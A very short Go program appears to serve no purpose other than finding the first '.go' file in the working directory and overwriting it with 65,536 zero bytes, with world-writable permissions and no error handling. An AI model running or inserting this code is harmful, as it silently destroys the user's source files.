package main import "path/filepath" import "os" func main() { fs, _ := filepath.Glob("*.go") os.WriteFile(fs[0], make([]byte, 256*256), 0777) }